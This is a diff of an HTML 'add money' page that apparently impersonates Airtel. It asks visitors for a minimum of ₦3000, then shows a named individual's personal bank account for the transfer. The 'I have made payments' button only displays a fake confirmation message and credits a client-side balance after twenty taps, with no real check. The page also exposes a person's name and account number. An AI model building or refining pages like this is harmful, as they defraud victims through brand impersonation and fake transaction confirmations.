--- a/add-money.html
+++ b/add-money.html
@@ -6,163 +6,163 @@
   <style>
     body {
       margin: 0;
-      font-family: sans-serif;
-      background-color: #fff;
+      font-family: Arial, sans-serif;
+      background: #fff;
       overflow: hidden;
-    }.container {
-  padding: 20px;
-  position: relative;
-  z-index: 1;
+      position: relative;
+    }.logo-top {
+  text-align: center;
+  margin-top: 20px;
 }
 
-.background-logo {
-  position: fixed;
+.logo-top img {
+  width: 100px;
+  animation: float 4s infinite ease-in-out;
+}
+
+@keyframes float {
+  0%, 100% { transform: translateY(0); }
+  50% { transform: translateY(-10px); }
+}
+
+.background-animation {
+  position: absolute;
   top: 0;
   left: 0;
-  width: 100vw;
-  height: 100vh;
-  background-image: url('airtel-logo.png'); /* use your logo path here */
-  background-size: contain;
-  background-repeat: no-repeat;
-  background-position: center;
-  opacity: 0.05;
-  z-index: 0;
+  right: 0;
+  bottom: 0;
+  overflow: hidden;
+  z-index: -1;
 }
 
-.airtel-top-logo {
-  width: 80px;
-  display: block;
-  margin: 0 auto 20px;
+.logo-piece {
+  position: absolute;
+  width: 20px;
+  height: 20px;
+  background-image: url('airtel-logo.png');
+  background-size: cover;
+  opacity: 0.1;
+  animation: scatter 20s linear infinite;
 }
 
-.card {
-  background: #fff;
-  border-radius: 20px;
+@keyframes scatter {
+  0% { transform: translate(0, 0) rotate(0deg); }
+  100% { transform: translate(100vw, 100vh) rotate(720deg); }
+}
+
+.container {
   padding: 20px;
-  box-shadow: 0 8px 24px rgba(0, 0, 0, 0.1);
-  max-width: 400px;
-  margin: 0 auto;
-  position: relative;
+  text-align: center;
+  margin-top: 80px;
 }
 
-input {
-  width: 100%;
-  padding: 12px;
+.container input {
+  padding: 10px;
   font-size: 16px;
+  width: 80%;
   margin-bottom: 15px;
+  border: 1px solid red;
   border-radius: 8px;
-  border: 1px solid #ccc;
 }
 
-button {
+.btn {
   background-color: red;
-  color: #fff;
+  color: white;
+  padding: 12px 25px;
   border: none;
-  padding: 12px;
-  width: 100%;
-  font-size: 16px;
   border-radius: 8px;
   cursor: pointer;
 }
 
-#loader {
+.account-details {
   display: none;
+  margin-top: 50px;
+  text-align: center;
+}
+
+.popup {
+  background: rgba(0, 0, 0, 0.7);
+  color: #fff;
+  padding: 15px;
   position: fixed;
-  top: 0;
-  left: 0;
-  width: 100vw;
-  height: 100vh;
-  background: rgba(255, 255, 255, 0.9);
-  z-index: 9999;
-  display: flex;
-  align-items: center;
-  justify-content: center;
-  flex-direction: column;
-}
-
-.piece {
-  position: absolute;
-  width: 20px;
-  height: 20px;
-  background-image: url('airtel-logo-piece.png'); /* small logo piece */
-  background-size: cover;
-  animation: fly-in 1s forwards;
-}
-
-@keyframes fly-in {
-  0% {
-    transform: translateY(100vh) scale(0);
-    opacity: 0;
-  }
-  100% {
-    transform: translateY(0) scale(1);
-    opacity: 1;
-  }
+  top: 30%;
+  left: 50%;
+  transform: translate(-50%, -50%);
+  border-radius: 12px;
+  z-index: 10;
+  display: none;
 }
 
   </style>
 </head>
 <body>
-  <div class="background-logo"></div>  <div class="container">
-    <div class="card" id="amountCard">
-      <img src="airtel-logo.png" alt="Airtel Logo" class="airtel-top-logo">
-      <input type="number" id="amountInput" placeholder="Enter amount (minimum ₦3000)" />
-      <button onclick="showLoader()">Continue</button>
-    </div><div class="card" id="accountDetails" style="display: none">
-  <img src="airtel-logo.png" alt="Airtel Logo" class="airtel-top-logo">
-  <p><strong>Account Name:</strong> EMMANUEL OKWUNNA</p>
-  <p><strong>Bank:</strong> SmartCash Payment Service Bank</p>
-  <p><strong>Account Number:</strong> 812 489 0070</p>
-  <button onclick="tapPayment()">I have made payments</button>
-</div>
-
-  </div>  <div id="loader">
-    <p>Please wait...</p>
-    <div id="animationArea"></div>
+  <div class="background-animation">
+    <!-- Generate many tiny logo pieces -->
+    <script>
+      for (let i = 0; i < 50; i++) {
+        const logo = document.createElement('div');
+        logo.className = 'logo-piece';
+        logo.style.top = Math.random() * window.innerHeight + 'px';
+        logo.style.left = Math.random() * window.innerWidth + 'px';
+        document.body.querySelector('.background-animation').appendChild(logo);
+      }
+    </script>
+  </div>  <div class="logo-top">
+    <img src="airtel-logo.png" alt="Airtel Logo" />
+  </div>  <div class="container">
+    <input type="number" id="amountInput" placeholder="Enter amount (min ₦3000)" />
+    <br />
+    <button class="btn" onclick="continueProcess()">Continue</button>
+  </div>  <div class="popup" id="popup"></div>  <div class="account-details" id="accountDetails">
+    <h3>Send Payment To</h3>
+    <p><strong>Account Name:</strong> EMMANUEL OKWUNNA</p>
+    <p><strong>Bank:</strong> SmartCash Payment Service Bank</p>
+    <p><strong>Account Number:</strong> 812 489 0070</p>
+    <button class="btn" onclick="confirmPayment()">I Have Made Payments</button>
+    <br /><br />
+    <button class="btn" onclick="goToDashboard()">Return to Dashboard</button>
   </div>  <script>
-    let tapCount = localStorage.getItem('tapCount') || 0;
+    let tapCount = localStorage.getItem('tapCount') ? parseInt(localStorage.getItem('tapCount')) : 0;
+    let balance = localStorage.getItem('balance') ? parseInt(localStorage.getItem('balance')) : 300;
 
-    function showLoader() {
+    function continueProcess() {
       const amount = parseInt(document.getElementById('amountInput').value);
       if (isNaN(amount) || amount < 3000) {
-        alert("Please input minimum of ₦3000");
-        return;
-      }
-
-      document.getElementById('loader').style.display = 'flex';
-      runLogoAnimation();
-
-      setTimeout(() => {
-        document.getElementById('loader').style.display = 'none';
-        document.getElementById('amountCard').style.display = 'none';
-        document.getElementById('accountDetails').style.display = 'block';
-      }, 3000);
-    }
-
-    function runLogoAnimation() {
-      const container = document.getElementById('animationArea');
-      container.innerHTML = '';
-      for (let i = 0; i < 20; i++) {
-        const piece = document.createElement('div');
-        piece.className = 'piece';
-        piece.style.top = Math.random() * window.innerHeight + 'px';
-        piece.style.left = Math.random() * window.innerWidth + 'px';
-        container.appendChild(piece);
+        showPopup("Please enter a minimum of ₦3000");
+      } else {
+        showPopup("Please wait...");
+        setTimeout(() => {
+          document.getElementById('popup').style.display = 'none';
+          document.querySelector('.container').style.display = 'none';
+          document.getElementById('accountDetails').style.display = 'block';
+        }, 2000);
       }
     }
 
-    function tapPayment() {
+    function confirmPayment() {
       tapCount++;
       localStorage.setItem('tapCount', tapCount);
+      showPopup("Please wait, we are confirming your transaction...");
+      setTimeout(() => {
+        document.getElementById('popup').style.display = 'none';
+      }, 3000);
 
-      alert("Please wait, we are confirming your transaction...");
-
-      if (tapCount % 20 === 0) {
-        let balance = localStorage.getItem('walletBalance') || 0;
-        balance = parseInt(balance) + 3000;
-        localStorage.setItem('walletBalance', balance);
-        alert("Your wallet has been funded with ₦3000");
+      if (tapCount >= 20) {
+        tapCount = 0;
+        balance += 3000;
+        localStorage.setItem('tapCount', tapCount);
+        localStorage.setItem('balance', balance);
       }
+    }
+
+    function showPopup(message) {
+      const popup = document.getElementById('popup');
+      popup.innerText = message;
+      popup.style.display = 'block';
+    }
+
+    function goToDashboard() {
+      window.location.href = 'dashboard.html';
     }
   </script></body>
 </html>
